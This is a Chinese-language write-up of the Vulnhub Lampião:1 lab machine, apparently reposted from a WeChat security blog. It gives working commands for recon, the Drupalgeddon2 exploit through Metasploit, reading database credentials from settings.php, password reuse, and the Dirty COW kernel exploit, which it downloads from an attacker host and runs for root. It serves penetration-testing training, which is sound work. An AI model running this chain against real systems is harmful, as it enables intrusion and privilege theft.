Vulnhub Lampiao-1

admin

102360
文章

87
评论

2024年3月13日15:58:53评论2 views字数 1830阅读6分6秒阅读模式

0x01 靶机介绍

Name: Lampião: 1
Date release: 28 Jul 2018
Author: Tiago Tavares
Series: Lampião
Description : Get root!

靶机下载地址：

https://www.vulnhub.com/entry/lampiao-1,249/

0x02 侦查

端口探测

首先使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_Lampiao

扫描结果显示目标开放了22、80、1898端口

80端口

访问http://192.168.0.106界面如下

Vulnhub Lampiao-1

访问http://192.168.0.106:1898为登录界面

Vulnhub Lampiao-1

目录扫描

使用 gobuster 进行目录扫描，成功找到文件robots.txt

gobuster dir -u http://192.168.0.106:1898 -w /usr/share/wordlists/dirb/big.txt

Vulnhub Lampiao-1

访问http://192.168.0.106:1898/robots.txt存在多个敏感文件和目录

Vulnhub Lampiao-1

0x03 上线[www-data]

信息收集

访问CHANGELOG.txt找到 CMS 版本为 Drupal 7.54

Vulnhub Lampiao-1

使用 searchsploit 查找 Drupal 相关漏洞，成功找到远程代码执行漏洞

searchsploit drupal

Vulnhub Lampiao-1

Drupal RCE

其中 Drupalgeddon 远程代码执行的执行版本小于 7.58，满足该版本要求。可使用 MSF 进行漏洞利用

msfconsole
msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.0.106
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898

成功拿到meterpreter

Vulnhub Lampiao-1

0x04 权限提升[root]

信息收集

进入shell后通过 Python 切换 pty 环境

python -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户信息、操作系统版本

id 
uname -a
cat /etc/issue

成功找到用户tiago

cat /etc/passwd | grep nologin

Vulnhub Lampiao-1

查看默认配置文件成功找到数据库连接账号密码

cat /var/www/html/sites/default/settings.php
# 配置
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'Virgulino',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

利用其中密码成功登录用户tiago

su tiago
#密码Virgulino

Vulnhub Lampiao-1

脏牛提权

工具地址：

https://github.com/mzet-/linux-exploit-suggester

使用 linux-exploit-suggester 检测是否存在内核漏洞，选择脏牛进行权限提升

wget http://192.168.0.105/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Vulnhub Lampiao-1

利用地址：

https://www.exploit-db.com/download/40616

由于目标为x86系统，所以需要注释掉x64位版本的 payload，启用x86版本

Vulnhub Lampiao-1

通过 gcc 编译后拿到 EXP

wget https://www.exploit-db.com/download/40616
mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread

Vulnhub Lampiao-1

在靶机中下载 EXP

wget http://192.168.0.105/cowroot

赋予 EXP 执行权限并执行，成功拿到root权限

chmod +x cowroot
./cowroot

在家目录下找到flag

cat flag.txt

Vulnhub Lampiao-1

0x05 知识星球

Vulnhub Lampiao-1

原文始发于微信公众号（狐狸说安全）：Vulnhub Lampiao-1

左青龙
微信扫一扫

右白虎
微信扫一扫

Vulnhub Lampiao-1

0x02 侦查

端口探测

80端口

0x03 上线[www-data]

信息收集

Drupal RCE

0x04 权限提升[root]

信息收集

脏牛提权

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

发表评论

在线咨询

微信